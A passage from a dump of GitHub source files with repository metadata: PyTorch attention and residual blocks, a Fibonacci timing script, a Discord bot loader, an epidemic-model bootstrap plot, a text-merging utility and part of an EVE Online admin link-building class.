channel_std), dim=2)\n return t \n \n def _style_integration(self, t):\n z = t * self.cfc[None, :, :] \n z = torch.sum(z, dim=2)[:, :, None, None] \n z_hat = self.bn(z)\n g = self.activation(z_hat)\n return g\n\n def forward(self, x):\n t = self._style_pooling(x)\n g = self._style_integration(t)\n return x * g\n\nclass BAM(nn.Module):\n def __init__(self, in_channels, reduction_ratio = 4):\n super().__init__()\n #Channel Attention\n self.c_pool = nn.AdaptiveAvgPool2d(1)\n self.c_fc1 = nn.Linear(in_channels, in_channels // reduction_ratio, bias = True)\n self.c_fc2 = nn.Linear(in_channels // reduction_ratio, in_channels, bias = True)\n self.c_bn = nn.BatchNorm2d(in_channels)\n\n #Spatial Attention\n self.s_conv1 = nn.Conv2d(in_channels, in_channels // reduction_ratio, kernel_size = 1)\n self.s_bn1 = nn.BatchNorm2d(in_channels // reduction_ratio)\n self.s_relu1 = nn.ReLU()\n self.s_conv2 = nn.Conv2d(in_channels // reduction_ratio, in_channels // reduction_ratio, kernel_size = 3, padding = 4, dilation = 4)\n self.s_bn2 = nn.BatchNorm2d(in_channels // reduction_ratio)\n self.s_relu2 = nn.ReLU() \n self.s_conv3 = nn.Conv2d(in_channels // reduction_ratio, in_channels // reduction_ratio, kernel_size = 3, padding = 4, dilation = 4)\n self.s_bn3 = nn.BatchNorm2d(in_channels // reduction_ratio)\n self.s_relu3 = nn.ReLU()\n self.s_conv4 = nn.Conv2d(in_channels // reduction_ratio, 1, kernel_size = 1)\n\n #Combine\n self.sigmoid = nn.Sigmoid()\n\n def channel_attention(self, x):\n b, c, _, _ = x.size()\n out = self.c_pool(x).view(b, c)\n out = self.c_fc1(out)\n out = self.c_fc2(out).view(b, c, 1, 1)\n out = self.c_bn(out)\n return out\n \n def spatial_attention(self, x):\n out = self.s_conv1(x)\n out = self.s_bn1(out)\n out = self.s_relu1(out)\n out = self.s_conv2(out)\n out = self.s_bn2(out)\n out = self.s_relu2(out)\n out = self.s_conv3(out)\n out = self.s_bn3(out)\n out = self.s_relu3(out)\n out = self.s_conv4(out)\n return out\n \n def forward(self, x):\n m_c = self.channel_attention(x)\n m_s = self.spatial_attention(x)\n out = self.sigmoid(m_c * m_s)\n return x * out\n\nclass CBAM(nn.Module):\n def __init__(self, in_channels, reduction_ratio = 4):\n super().__init__()\n\n #Channel Attention(MaxPool)\n self.c_pool1 = nn.AdaptiveAvgPool2d(1)\n self.c_fc1 = nn.Linear(in_channels, in_channels // reduction_ratio, bias = True)\n self.c_relu1 = nn.ReLU()\n self.c_fc2 = nn.Linear(in_channels // reduction_ratio, in_channels, bias = True)\n\n #Channel Attention(AvgPool)\n self.c_pool2 = nn.AdaptiveMaxPool2d(1)\n self.c_fc3 = nn.Linear(in_channels, in_channels // reduction_ratio, bias = True)\n self.c_relu2 = nn.ReLU()\n self.c_fc4 = nn.Linear(in_channels // reduction_ratio, in_channels, bias = True)\n\n #Combine\n self.c_sigmoid1 = nn.Sigmoid()\n\n #Spatial Attention\n self.s_conv1 = nn.Conv2d(2, 1, kernel_size = 7, stride = 1, padding = 3)\n self.s_bn1 = nn.BatchNorm2d(1)\n self.s_sigmoid2 = nn.Sigmoid()\n \n def forward(self, x):\n b, c, _, _ = x.size()\n\n out_max = self.c_pool1(x).view(b, c)\n out_max = self.c_fc1(out_max)\n out_max = self.c_relu1(out_max)\n out_max = self.c_fc2(out_max).view(b, c, 1, 1)\n\n out_avg = self.c_pool2(x).view(b, c)\n out_avg = self.c_fc3(out_avg)\n out_avg = self.c_relu2(out_avg)\n out_avg = self.c_fc4(out_avg).view(b, c, 1, 1)\n\n out_channel = self.c_sigmoid1(out_max + out_avg)\n out_channel = x * out_channel\n\n out_spatial = torch.cat((torch.max(out_channel,1)[0].unsqueeze(1), torch.mean(out_channel,1).unsqueeze(1)), dim=1)\n out_spatial = self.s_conv1(out_spatial)\n out_spatial = self.s_bn1(out_spatial)\n out_spatial = self.s_sigmoid2(out_spatial)\n out_spatial = out_channel * out_spatial\n return out_spatial\n \nclass GE(nn.Module):\n def __init__(self, in_channels, location):\n super().__init__()\n kernel_size = [56, 28, 14, 7]\n self.conv = nn.Conv2d(in_channels, in_channels, kernel_size = kernel_size[location], groups = in_channels)\n self.bn = nn.BatchNorm2d(in_channels)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n b, c, _, _ = x.size()\n out = self.conv(x)\n out = self.bn(out)\n out = self.sigmoid(out)\n return x * out\n\nclass SepConv(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size):\n super().__init__()\n self.conv1 = nn.Conv2d(in_channels, in_channels, kernel_size = kernel_size, stride = 1, padding = 1, groups = in_channels, bias = False)\n self.bn1 = nn.BatchNorm2d(in_channels, eps = 1e-05, momentum = 0.01)\n self.relu1 = nn.ReLU(inplace = True)\n self.conv2 = nn.Conv2d(in_channels, out_channels, kernel_size = 1, stride = 1, bias = False)\n self.bn2 = nn.BatchNorm2d(out_channels, eps = 1e-05, momentum = 0.01)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu1(out)\n out = self.conv2(out)\n out = self.bn2(out)\n return out\n\nclass MBConv(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding, expansion_ratio, residual = True, attention = None):\n super().__init__()\n self.attention = attention\n self.residual = residual\n expanded_channels = in_channels * expansion_ratio\n if self.residual == True:\n self.residual = nn.Conv2d(in_channels, out_channels, kernel_size = 1, stride = stride, bias = False)\n self.conv1 = nn.Conv2d(in_channels, expanded_channels, kernel_size = 1, stride = 1, bias = False)\n self.bn1 = nn.BatchNorm2d(expanded_channels, eps = 1e-05, momentum = 0.01)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(expanded_channels, expanded_channels, kernel_size = kernel_size, stride = stride, padding = padding, groups = expanded_channels, bias = False)\n self.bn2 = nn.BatchNorm2d(expanded_channels, eps = 1e-05, momentum = 0.01)\n self.relu2 = nn.ReLU()\n if self.attention == \"SE\":\n self.se = SEBlock(expanded_channels, reduction_ratio = 4)\n self.conv3 = nn.Conv2d(expanded_channels, out_channels, kernel_size = 1, stride = 1, bias = False)\n self.bn3 = nn.BatchNorm2d(out_channels, eps = 1e-05, momentum = 0.01)\n\n def forward(self, x):\n if self.residual == True:\n residual = self.residual(x)\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu1(out)\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu2(out)\n if self.attention == \"SE\":\n out = self.se(out)\n out = self.conv3(out)\n out = self.bn3(out)\n if self.residual == True:\n out += residual\n return out\n\nclass ResBlock(nn.Module):\n def __init__(self, in_channels, out_channels, stride):\n super().__init__()\n self.stride = stride\n if self.stride != 1:\n self.residual = nn.Conv2d(in_channels, out_channels, kernel_size = 1, stride = stride, bias = False)\n self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size = 3, stride = stride, padding = 1, bias = False)\n self.bn1 = nn.BatchNorm2d(out_channels)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(out_channels, out_channels, kernel_size = 3, stride = 1, padding = 1, bias = False)\n self.bn2 = nn.BatchNorm2d(out_channels)\n self.relu2 = nn.ReLU()\n\n def forward(self, x):\n residual = x\n if self.stride != 1:\n residual = self.residual(x)\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu1(out)\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu2(out)\n out += residual\n return out\n\nclass Bottleneck_Block(nn.Module):\n def __init__(self, in_channels, bottleneck_channels, out_channels, stride):\n super().__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n if self.in_channels != self.out_channels:\n self.residual = nn.Conv2d(in_channels, out_channels, kernel_size = 1, stride = stride, bias = False)\n self.conv1 = nn.Conv2d(in_channels, bottleneck_channels, kernel_size = 1, stride = 1, bias = False)\n self.bn1 = nn.BatchNorm2d(bottleneck_channels)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(bottleneck_channels, bottleneck_channels, kernel_size = 3, stride = stride, padding = 1, bias = False)\n self.bn2 = nn.BatchNorm2d(bottleneck_channels)\n self.relu2 = nn.ReLU()\n self.conv3 = nn.Conv2d(bottleneck_channels, out_channels, kernel_size = 1, stride = 1, bias = False)\n self.bn3 = nn.BatchNorm2d(out_channels)\n self.relu3= nn.ReLU()\n\n def forward(self, x):\n residual = x\n if self.in_channels != self.out_channels:\n residual = self.residual(x)\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu1(out)\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu2(out)\n out = self.conv3(out)\n out = self.bn3(out)\n out = self.relu3(out)\n out += residual\n return out\n\nclass Depthwise_Separable_Conv(nn.Module):\n def __init__(self, in_channels, out_channels, stride):\n super().__init__()\n self.conv1 = nn.Conv2d(in_channels, in_channels, kernel_size = 3, stride = stride, padding = 1, groups = in_channels, bias = False)\n self.bn1 = nn.BatchNorm2d(in_channels)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(in_channels, out_channels, kernel_size = 1, stride = 1, bias = False)\n self.bn2 = nn.BatchNorm2d(out_channels)\n self.relu2 = nn.ReLU()\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu1(out)\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu2(out)\n return out\n\n\n ","repo_name":"satyagraha5/Earth","sub_path":"Civilization/Shrine/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":11742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30440239654","text":"import time\n\ndef fibonacci1(n: int) -> int:\n if n == 0: return 0\n if n == 1: return 1\n return fibonacci1(n - 1) + fibonacci1(n - 2)\n\ndef get_runtime_of_fibonacci1(n: int) -> float:\n start1 = time.time()\n fibonacci1(n)\n stop1 = time.time()\n return (stop1 - start1) * (10 ** (3))\n\ncount = 0\nfibonacci1_data = []\nwhile count < 100:\n fibonacci1_data.append(get_runtime_of_fibonacci1(count))\n count += 5\n\nprint(fibonacci1_data)\n","repo_name":"juliencol/complexity-simulation","sub_path":"functions/fibonacci1.py","file_name":"fibonacci1.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20660029118","text":"import discord\nfrom discord.ext import commands\n\nimport os\n\nfrom DATA.Database import Database\n\nasync def get_prefix(bot, message):\n if not message.guild:\n return \"!\"\n\n prefixe = await bot.db.fetchval('prefixes', 'prefix', f'g_id = :g_id', g_id=message.guild.id)\n\n if not prefixe:\n return commands.when_mentioned_or(\"!\")(bot, message)\n\n return commands.when_mentioned_or(prefixe)(bot, message)\n\n\nbot = commands.Bot(command_prefix=get_prefix)\nbot.remove_command('help')\n\nbot.db = Database('DATA/bot.db')\n\nTOKEN = open('DATA/TOKEN.txt', 'r').readline().strip()\n\n@bot.event\nasync def on_ready():\n print('Logged in as')\n print(bot.user.name)\n print('------')\n\n bot.channels_words = await get_channels_words()\n\nasync def get_channels_words():\n words = await bot.db.fetchall('words', ['g_id', 'chn_id', 'word'])\n if words is None:\n return dict()\n\n channels_words = dict()\n for word in words:\n g_id = str(word[0])\n chn_id = str(word[1])\n\n if g_id not in channels_words:\n channels_words[g_id] = dict()\n\n if chn_id not in channels_words[g_id]:\n channels_words[g_id][chn_id] = list()\n\n channels_words[g_id][chn_id].append(word[2])\n\n return channels_words\n\n\n\nfor cog in os.listdir(\"./cogs\"):\n if cog.endswith(\".py\") and not cog.startswith(\"_\"):\n try:\n cog = f\"cogs.{cog.replace('.py', '')}\"\n bot.load_extension(cog)\n except Exception as e:\n print(f\"{cog} can not be loaded:\")\n raise e\n\nbot.run(TOKEN)\n","repo_name":"ahmedGamalhamed/re","sub_path":"Keyword_Bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15953887565","text":"import numpy as np \nimport matplotlib as mpl \nfrom matplotlib import pyplot as plt\nfrom matplotlib import dates as mdates\nimport pandas as pd\nimport seaborn as sns\nimport datetime as dt\nimport pickle \nfrom scipy.integrate import odeint\nimport sys\nimport matplotlib.transforms as mtransforms\nfrom numpy.random import poisson\nimport fitSEIRTC\nimport h5py\nfrom pathlib import Path\nsys.path.append('../')\nimport compartmental\n\ncolorpalette = sns.color_palette('colorblind', n_colors=5)\n\naustria_data = pd.read_csv(\"../austria_data.csv\")\ndata = austria_data.loc[(austria_data['date'] >= '2020-09-01') & \n (austria_data['date'] <= '2020-12-06')]\n\ndays = [dt.datetime.strptime(date, '%Y-%m-%d').date() \n for date in data['date'].to_numpy()]\n\ndatafit = austria_data.loc[(austria_data['date'] >= '2020-09-01') & \n (austria_data['date'] < '2020-11-03')]\n\ndaysfit = [dt.datetime.strptime(date, '%Y-%m-%d').date() \n for date in datafit['date'].to_numpy()]\n\nsimulation_days = np.arange(0, len(daysfit))\n\nSEIRTC = pickle.load(open(\"../model_SEIRTC.p\", \"rb\"))\n\ninit_pop_SEIRTC = pickle.load(open(\"../initial_population_SEIRTC.p\", \"rb\"))\nparameters_SEIRTC = pickle.load(open(\"../parameters_SEIRTC.p\", \"rb\"))\n\nSEIRTC.set_parameters(list(parameters_SEIRTC))\n\n_, _, ode_SEIRTC = SEIRTC.generate_ode()\n\ndatapath = Path(\"bootstrap.hdf5\")\ndatafile = h5py.File(datapath, 'r')\nnum_bootstrap = 10 # datafile['meta']['n_bootstrap'][()]\ndatafile.close()\n\nfig, axes = plt.subplots(nrows = 1, ncols = 4, figsize=(12, 3))\nlabels = ['A', 'B', 'C', 'D']\n\nfor label, ax in zip(labels, axes):\n\n trans = mtransforms.ScaledTranslation(-20/72, 7/72, fig.dpi_scale_trans)\n ax.text(0.0, 1.0, label+'.', transform=ax.transAxes + trans,\n fontsize='xx-large', va='bottom')\n\n# original solution\nsolution_SEIRTC = odeint(\n ode_SEIRTC,\n np.array(list(init_pop_SEIRTC.values())),\n simulation_days,\n args = (list(parameters_SEIRTC.values()),)\n )\n\nresults_SEIRTC = fitSEIRTC.results(solution_SEIRTC, SEIRTC)\ncases = results_SEIRTC['cases']\ntests = results_SEIRTC['tests']\n\nnp.random.seed(1)\n\nbootstrap_cases = np.zeros(cases.shape)\nbootstrap_tests = np.zeros(tests.shape)\n\nfor day, n_case in enumerate(cases):\n bootstrap_cases[day] = poisson(n_case)\n\nfor day, n_test in enumerate(tests):\n bootstrap_tests[day] = poisson(n_test)\n\naxes[0].plot(cases, color=colorpalette[0], lw=2.0, label='best-fit SEIRTC')\naxes[0].plot(\n bootstrap_cases, color='black', lw=1.0, label='Poisson bootstrap'\n )\n\naxes[1].plot(tests, color=colorpalette[3], lw=2.0, label='best-fit SEIRTC')\naxes[1].plot(\n bootstrap_tests, color='black', lw=1.0, label='Poisson bootstrap'\n )\n\n# Bootstraps \n\ninit_pop = init_pop_SEIRTC.copy()\npars = parameters_SEIRTC.copy()\n\nfor n in range(1, num_bootstrap + 1):\n datafile = h5py.File(datapath, 'r')\n\n for key in datafile[f'{n}']['init_pop'].keys():\n init_pop[key] = datafile[f'{n}']['init_pop'][key][()]\n\n for key in datafile[f'{n}']['pars'].keys():\n pars[key] = datafile[f'{n}']['pars'][key][()]\n\n datafile.close()\n\n sol = odeint(\n ode_SEIRTC,\n np.array(list(init_pop.values())),\n simulation_days,\n args = (list(pars.values()),)\n )\n\n results = fitSEIRTC.results(sol, SEIRTC)\n cases = results['cases']\n tests = results['tests'] \n axes[2].plot(cases, color=colorpalette[0], alpha=0.2)\n axes[3].plot(tests, color=colorpalette[3], alpha=0.2)\n\n# axes[1].set_yscale('log')\n# axes[1].set_yscale('log')\n\nfor ax in axes:\n ax.set_xlim(0, 20)\n\nfor i in [0, 2]:\n axes[i].set_ylim(350, 800)\n axes[i].set_ylabel(\"Cases\")\n\nfor i in [1, 3]:\n axes[i].set_ylim(9000, 18000)\n axes[i].set_ylabel(\"Tests\")\n\naxes[0].legend()\naxes[1].legend()\n\nplt.tight_layout()\nfig.savefig(\"bootstrap.png\", dpi=150)\n\nplt.show()\n","repo_name":"burakbudanur/autoacc-public","sub_path":"python/bootstrap/plot_bootstrap.py","file_name":"plot_bootstrap.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28406080582","text":"import re\n\nmylines = [] # Declare an empty list named mylines.\nmylines2 = [] # Declare an empty list named mylines2.\n\n\n\n# with open ('Language2.txt', 'rt', encoding=\"utf16\") as myfile: # Open lorem.txt for reading\n# for txtline in myfile: # For each line, stored as myline,\n#\n#\n# regex = re.compile('=')\n# if (regex.search(txtline) == None):\n# new_line = txtline\n# mylines.append(new_line)\n# else:\n# old_line = txtline\n# new_line = old_line.split(\"=\", 1)[1]\n# mylines.append(new_line) # add its contents to mylines.\n#\n#\nwith open('Language2.txt', 'rt', encoding=\"utf16\") as myfile2: # Open lorem.txt for reading\n for txtline2 in myfile2: # For each line, stored as myline,\n\n regex = re.compile('=')\n if (regex.search(txtline2) == None):\n new_line2 = txtline2\n mylines2.append(new_line2)\n else:\n old_line2 = txtline2\n new_line2 = old_line2.split('=')[0]+'='\n mylines2.append(new_line2 + '\\n') # add its contents to mylines.\n\n#\n# with open('Language3.txt', 'w', encoding=\"utf16\") as f:\n# for line in mylines:\n# if line == \"\":\n# f.write(\"\\n\")\n# else:\n# f.write(line)\n#\nwith open('Language4.txt', 'w', encoding=\"utf16\") as f:\n for line2 in mylines2:\n if line2 == \"\":\n f.write(\"\\n\")\n else:\n f.write(line2)\n\n\n\ncombine =[]\n\nwith open(\"language3.txt\", encoding=\"utf16\") as language3lines:\n with open('language4.txt', encoding=\"utf16\") as language4lines:\n with open(\"combined.txt\", \"w\", encoding=\"utf16\") as combinedlines:\n #Read first file\n xlines = language3lines.readlines()\n #Read second file\n ylines = language4lines.readlines()\n #Combine content of both lists\n #combine = list(zip(ylines,xlines))\n #Write to third file\n for i in range(len(xlines)):\n line = ylines[i].strip() + xlines[i]\n combinedlines.write(line)","repo_name":"Patryk-Rak/text-replacer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33639311573","text":"#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/eve/common/script/util/espwriters.py\nimport htmlwriter\nimport util\nimport re\nimport blue\nimport sys\nimport macho\nimport notificationUtil\nimport time\nimport os\nimport localization\ntry:\n import logConst\nexcept:\n logConst = util.KeyVal()\n\nfrom service import ROLEMASK_VIEW, ROLE_ADMIN, ROLE_CONTENT, ROLE_GML, ROLE_GMH, ROLE_PROGRAMMER, ROLE_PETITIONEE\n\nclass ESPHtmlWriter(htmlwriter.SPHtmlWriter):\n __guid__ = 'htmlwriter.ESPHtmlWriter'\n\n def SelectCharacter(self):\n if session.charid is None:\n urlparameters = ''\n for q in self.request.query.iteritems():\n if q[0] is not '':\n urlparameters += '%s=%s&' % q\n\n session.redirecturl = self.request.path + '?' + urlparameters\n self.response.Redirect('/gm/character.py?action=MyCharacters&')\n\n def AppBottomLeft(self):\n s = htmlwriter.SPHtmlWriter.AppBottomLeft(self)\n if macho.mode == 'server':\n if session.charid:\n s += ' - Logoff'\n return s\n\n if macho.mode == 'server':\n\n def GetOperationText(self, operationID, isDescription = False):\n if operationID not in self.cache.Index(const.cacheStaOperations):\n return ''\n if isDescription:\n return localization.GetByMessageID(self.cache.Index(const.cacheStaOperations, operationID).descriptionID)\n return localization.GetByMessageID(self.cache.Index(const.cacheStaOperations, operationID).operationNameID)\n\n def GetRoleDescription(self, roleID, isShort = False):\n if roleID not in self.cache.Index(const.cacheCrpRoles):\n return ''\n if isShort:\n return localization.GetByMessageID(self.cache.Index(const.cacheCrpRoles, roleID).shortDescriptionID)\n return localization.GetByMessageID(self.cache.Index(const.cacheCrpRoles, roleID).descriptionID)\n\n def GetCelestialDescription(self, itemID):\n if itemID in self.cache.Index(const.cacheMapCelestialDescriptions):\n return localization.GetByMessageID(self.cache.Index(const.cacheMapCelestialDescriptions, itemID).descriptionID)\n return ''\n\n def GetCorpActivityName(self, activityID):\n if activityID in self.cache.Index(const.cacheCrpActivities):\n return localization.GetByMessageID(self.cache.Index(const.cacheCrpActivities, activityID).activityNameID)\n return ''\n\n def MetaGroupLink(self, metaGroupID, linkText = None, props = ''):\n if metaGroupID is None:\n return ''\n else:\n if linkText is None:\n linkText = cfg.invmetagroups.Get(metaGroupID).metaGroupName\n if linkText is None:\n return self.FontRed('Unknown')\n return self.Link('/gd/type.py', linkText, {'action': 'MetaGroups'}, props)\n\n def OwnerLink(self, ownerID, ownerTypeID = None, linkText = None, props = ''):\n if ownerID is None:\n return ''\n if ownerTypeID is None:\n try:\n owner = cfg.eveowners.Get(ownerID)\n except:\n sys.exc_clear()\n if linkText is None:\n return self.FontRed('???')\n else:\n return linkText\n\n ownerTypeID = owner.typeID\n if not linkText:\n linkText = owner.ownerName\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n if ownerTypeID == const.typeFaction:\n return self.FactionLink(ownerID, linkText, props)\n elif ownerTypeID == const.typeCorporation:\n return self.CorporationLink(ownerID, linkText, props)\n elif ownerTypeID == const.typeAlliance:\n return self.AllianceLink(ownerID, linkText, props)\n elif ownerTypeID == const.typeSystem:\n return linkText\n else:\n return self.CharacterLink(ownerID, linkText, props)\n\n def IPAddress(self, ipAddress, ipAddressID = None):\n if not ipAddress and ipAddressID is None:\n return ''\n if ipAddressID:\n ipAddressLink = self.Link('/gm/users.py', ipAddress, {'action': 'IPLogs',\n 'IPID': ipAddressID})\n else:\n ipAddressLink = self.Link('/gm/users.py', ipAddress, {'action': 'IPLogs',\n 'IP': ipAddress})\n if ipAddress:\n evelogsUrl = self.cache.Setting('system', 'evelogsUrl')\n if not evelogsUrl:\n return ipAddressLink\n evelogsUrl = 'http://%s/' % evelogsUrl\n flagLink = self.GetSpan(self.Link('%sIPLookup?ip=%s' % (evelogsUrl, ipAddress), self.Image('%sIPLookup?ip=%s&flag=16' % (evelogsUrl, ipAddress))), className='csp-flag')\n return ipAddressLink + ' ' + flagLink\n\n def LocationLink(self, locationID, linkText = None, props = ''):\n if locationID is None:\n return ''\n if linkText is None:\n if locationID < 70000000 or locationID > 80000000:\n try:\n location = cfg.evelocations.Get(locationID)\n except:\n sys.exc_clear()\n return self.FontRed('???')\n\n linkText = location.locationName\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n if locationID < const.minRegion:\n return linkText\n elif locationID < const.minConstellation:\n return self.RegionLink(locationID, linkText, props)\n elif locationID < const.minSolarSystem:\n return self.ConstellationLink(locationID, linkText, props)\n elif locationID < const.minUniverseCelestial:\n return self.SystemLink(locationID, linkText, props)\n elif locationID < const.minStation:\n return linkText\n elif locationID < const.minUniverseAsteroid:\n return self.StationLink(locationID, linkText, props)\n else:\n return linkText\n\n def CharacterLink(self, characterID, linkText = None, props = '', noHover = False):\n if util.IsDustCharacter(characterID):\n return htmlwriter.SPHtmlWriter.CharacterLink(self, characterID, linkText, props)\n if characterID is None:\n return ''\n if linkText is None:\n linkText = self.OwnerName(characterID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltip(href='/gm/character.py?action=Character&characterID=%s' % characterID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=1' % characterID, title=linkText, caption=linkText)\n\n def CharacterLinkActions(self, characterID, linkText = None, actions = []):\n if characterID is None:\n return ''\n if linkText is None:\n linkText = self.OwnerName(characterID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltipActions(href='/gm/character.py?action=Character&characterID=%s' % characterID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=1' % characterID, title=linkText, caption=linkText, actions=actions)\n\n def PetitionLink(self, petID, linkText = None, props = ''):\n if petID is None:\n return ''\n else:\n if linkText is None:\n linkText = 'petition'\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.Link('/gm/petitionClient.py', linkText, {'action': 'ViewPetition',\n 'petitionID': petID}, props)\n\n def CorporationLink(self, corporationID, linkText = None, props = ''):\n if corporationID is None:\n return ''\n if linkText is None:\n linkText = self.OwnerName(corporationID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltip(href='/gm/corporation.py?action=Corporation&corporationID=%s' % corporationID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=3' % corporationID, title=linkText, caption=linkText)\n\n def AllianceLink(self, allianceID, linkText = None, props = ''):\n if allianceID is None:\n return ''\n if linkText is None:\n linkText = self.OwnerName(allianceID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltip(href='/gm/alliance.py?action=Alliance&allianceID=%s' % allianceID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=9' % allianceID, title=linkText, caption=linkText)\n\n def WarableEntityLink(self, ownerID, linkText = None, props = ''):\n if ownerID is None:\n return ''\n else:\n if linkText is None:\n linkText = self.OwnerName(ownerID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.Link('/gm/war.py', linkText, {'action': 'WarableEntity',\n 'ownerID': ownerID}, props)\n\n def FactionLink(self, factionID, linkText = None, props = ''):\n if factionID is None:\n return ''\n if linkText is None:\n linkText = self.OwnerName(factionID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltip(href='/gm/faction.py?action=Faction&factionID=%s' % factionID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=8' % factionID, title=linkText, caption=linkText)\n\n def StationLink(self, stationID, linkText = None, props = ''):\n if stationID is None:\n return ''\n if linkText is None:\n linkText = self.LocationName(stationID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltip(href='/gm/stations.py?action=Station&stationID=%s' % stationID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=7' % stationID, title=linkText, caption=linkText)\n\n def WorldSpaceLink(self, worldSpaceID, linkText = None, props = ''):\n if worldSpaceID is None:\n return ''\n else:\n if linkText is None:\n linkText = self.LocationName(worldSpaceID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.Link('/gm/worldSpaces.py', linkText, {'action': 'WorldSpace',\n 'worldspaceID': worldSpaceID}, props)\n\n def SystemLink(self, systemID, linkText = None, props = ''):\n if systemID is None:\n return ''\n if linkText is None:\n linkText = self.LocationName(systemID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltip(href='/gd/universe.py?action=System&systemID=%s' % systemID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=4' % systemID, title=linkText, caption=linkText)\n\n def ConstellationLink(self, constellationID, linkText = None, props = ''):\n if constellationID is None:\n return ''\n if linkText is None:\n linkText = self.LocationName(constellationID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltip(href='/gd/universe.py?action=Constellation&constellationID=%s' % constellationID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=6' % constellationID, title=linkText, caption=linkText)\n\n def RegionLink(self, regionID, linkText = None, props = ''):\n if regionID is None:\n return ''\n if linkText is None:\n linkText = self.LocationName(regionID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltip(href='/gd/universe.py?action=Region®ionID=%s' % regionID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=5' % regionID, title=linkText, caption=linkText)\n\n def PlanetLink(self, planetID, linkText = None, props = ''):\n if planetID is None:\n return ''\n if linkText is None:\n linkText = self.LocationName(planetID)\n if linkText is None:\n return self.FontRed('Unknown')\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.GetTooltip(href='/gd/universe.py?action=Planet&planetID=%s' % planetID, ajax='/gm/worker_info.py?action=FetchInfo&id=%s&idType=10' % planetID, title=linkText, caption=linkText)\n\n def DistrictLink(self, district, text = None, props = ''):\n if district is None:\n return ''\n if isinstance(district, (int, long)):\n district = self.session.ServiceProxy('districtManager').GetDistrict(district)\n if text is None:\n text = localization.GetImportantByLabel('UI/Locations/LocationDistrictFormatter', solarSystemID=district['solarSystemID'], romanCelestialIndex=util.IntToRoman(district['celestialIndex']), districtIndex=district['index'])\n if text is None:\n return self.FontRed('Unknown')\n if text is not None:\n text = self.HTMLEncode(text)\n return self.Link('/dust/districts.py', text, {'action': 'District',\n 'districtID': district['districtID']}, props)\n\n def BattleLink(self, battle, text = None, props = ''):\n if battle is None:\n return ''\n if isinstance(battle, (int, long)):\n battle = self.session.ServiceProxy('battleManager').GetBattleInfo(battle)\n if not text:\n if battle['battleName']:\n text = battle['battleName']\n elif battle['conflictID'] and battle['conflictID'] > 0:\n text = 'Corporation Battle - %s' % battle['battleID']\n else:\n text = 'Instant Battle - %s' % battle['battleID']\n return self.Link('/dust/battles.py', text, {'action': 'Battle',\n 'battleID': battle['battleID']}, props)\n\n def MapLink(self, itemID, linkText = 'Map', props = ''):\n if linkText is not None:\n linkText = 